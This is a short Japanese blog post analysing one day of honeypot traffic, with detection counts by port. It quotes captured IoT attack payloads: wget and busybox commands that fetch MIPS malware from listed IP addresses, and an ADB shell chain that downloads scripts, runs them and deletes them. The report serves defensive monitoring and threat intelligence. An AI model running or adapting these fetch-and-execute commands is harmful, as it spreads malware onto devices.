ハニーポット簡易分析(11日目:8/18)
いつもと内容がほぼ変わらないですが、8/18(11日目)の分析結果となります。
Honeytrap
検知数: 7247件(0byte 以上 4796件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
1433 | Microsoft SQL Server | 2,153 | 44.89% | 調査行為 |
445 | SMB | 1,512 | 31.53% | 調査行為 |
22222 | SSH | 64 | 1.33% | 調査行為 |
3389 | RDP | 47 | 0.98% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 45 | 0.94% | /conf へのアクセス |
8080 | PROXY | 43 | 0.90% | 調査行為 |
52869 | D-Link, Realtek SDK | 42 | 0.88% | マルウェアダウンロード |
119 | NNTP | 32 | 0.67% | 調査行為 |
515 | ? | 32 | 0.67% | 調査行為 |
9943 | ? | 32 | 0.67% | 調査行為 |
ポート 1433宛への通信が増加しましたが、通信内容については特に変化はありませんでした。他に特徴的な通信もありませんでした。
<マルウェアダウンロード>
ポート:52869
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
ポート:5555
shell:cd /data/local/tmp;wget hxxp://207.148.78.152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
ポート:37215
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
/bin/busybox wget -g 209[.]141[.]33[.]86 -l /tmp/soVxo -r /x
断定は出来ないですが、いずれもIoTを狙ってたものだと思われます。
今回の分析結果は以上となります。